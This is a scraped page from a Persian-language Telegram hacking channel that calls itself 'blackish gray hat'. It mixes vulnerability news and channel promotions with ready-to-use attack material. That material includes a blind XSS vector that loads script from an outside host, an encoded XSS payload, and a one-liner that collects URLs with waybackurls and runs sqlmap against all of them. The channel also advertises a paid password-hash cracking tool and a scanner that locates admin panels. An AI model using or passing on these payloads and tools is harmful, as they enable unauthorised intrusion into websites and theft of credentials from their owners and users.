Eʀᴏ ··ʜᴀᴄᴋ··
4.85K subscribers
65 photos
27 videos
10 files
105 links
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
加入频道
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «یه حمایتمون نشه🥲❤️🫶🏻 https://yangx.top/boost/EroHack0»
‼️آسیب پذیری در مجنتو برای هک وب سایت ها و تزریق بدافزار استفاده می شود

متخصصان Sansec هشدار دادند که هکرها در حال حاضر از آسیب‌پذیری اخیر در Magento (CVE-2024-20720) استفاده می‌کنند و از آن برای معرفی یک درب پشتی دائمی به سایت‌های تجارت الکترونیک استفاده می‌کنند.

@EroHack | Boost
1521🔥11
‼️آسیب پذیری حیاتی در پلاگین وردپرس LayerSlider میلیون ها سایت را تحت تاثیر قرار می دهد

یک آسیب‌پذیری حیاتی تزریق SQL در افزونه محبوب LayerSlider برای وردپرس می‌تواند برای استخراج اطلاعات حساس از پایگاه‌های داده، مانند هش رمز عبور، استفاده شود.


@EroHack | Boost
1442👍2
🔴 یک آسیب پذیری در توییتر توسط CertiKAlert منتشر شده، مبنی بر وجود آسیب پذیری RCE با خطر بالا ، در نسخه ی دسکتاپ تلگرام.
به گفته این اکانت این آسیب پذیری پتانسیل اجرای کد رو از طریق انتشار فایلهای مدیا مانند عکس و ویدیو رو میده.
پیشنهاد شده که از قسمت زیر دانلود اتوماتیک رو غیرفعال کنید :

Settings > Advanced > Automatic Media Download > Disable auto-download for "Photos", "Videos", and "Files" across all chat types (Private chats, groups, and channels)

تلگرام زیر همین پست، گفته که این ویدیو رو بعنوان آسیب پذیری تایید نمیکنه و احتمالا یه فریب یا شوخیه.

🆔 @EroHack
➡️ Boost
👍12🗿442
👍1763
Eʀᴏ ··ʜᴀᴄᴋ··
Voice message
🛡دوستان حتما گوش کنید🛡
👍1653
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «🛡دوستان حتما گوش کنید🛡»
Eʀᴏ ··ʜᴀᴄᴋ··
📦استفاده ابزار: برض مثال پسورد شما ۱۲۳۴۵ هستش وقتی به هش تبدیل میشه به این شکل در میاد: 1ag6Gwjk09hapkeUWU حالا شما با استفاده از ابزار ما میتونید این هش رو کرک کنید و به پسورد اصلی برسید. ❤️برای تهیه ابزار به آیدی زیر پیام بدید ID: فروشه بسته شد 👌یادتون…
😆 ابزار کرک هش فروشش باز شد.

🤬 اول به صورت کامل ویدیو و توضیحاته بالا رو بخونید تا کاربرد ابزار رو بدونید به چه صورته

😮 برای خرید به آیدی زیر پیام بدید.

💵قیمت: ۲۵٫۰۰۰ هزار تومان
💬@GoRunEro
Please open Telegram to view this post
VIEW IN TELEGRAM
10🔥4211
Eʀᴏ ··ʜᴀᴄᴋ··
Voice message
این ویس روهم گوش کنید⚡️
Please open Telegram to view this post
VIEW IN TELEGRAM
112👍1
پای کار باشید🎶
ری اکشن فراموش نشه🔥👍
Please open Telegram to view this post
VIEW IN TELEGRAM
184👍3
Media is too big
VIEW IN TELEGRAM
🔥 معرفی ابزار Scan Ero 🛍

😆توضیحات:
شما میتوانید با استفاده از ابزار بالا سایت مورد نظر خودتون رو اسکن کنید ip سایت رو پیدا کنید و غیره حتی میتونید پنل ادمین سایت روهم پیدا کنید.☠️

💬 @GoRunEro
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1063👍2👎1🤯1
🤖Here's another Blind XSS vector!

1"/import(src)'<Script/Src=//X55.is?1=00><Img/OnLoad='


🫦Where 00 is your unique KNOXSS id.
➡️If it fails with <Script it might pop with <Img in a multi reflection scenario!

#XSS

🔈 @EroHack
Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥932
Payload:
"%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

#XSS

🌐@EroHack
Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
933👍1
🆕 SQLMap from Waybackurls

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"


#Sqlmap #BugBounty

🔥@EroHack
🙏Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍105431🔥1🗿1
👍1222🔥1🗿11
🔝پیش به سوی ۱۰۰۰ تایی شدن و فراتر از آن

🔥به هزار تا برسیم تازه مسابقه های چنل استارت میخوره🔥

💥 ری اکشن فراموش نشه 💥
Please open Telegram to view this post
VIEW IN TELEGRAM
👍193🔥3🗿33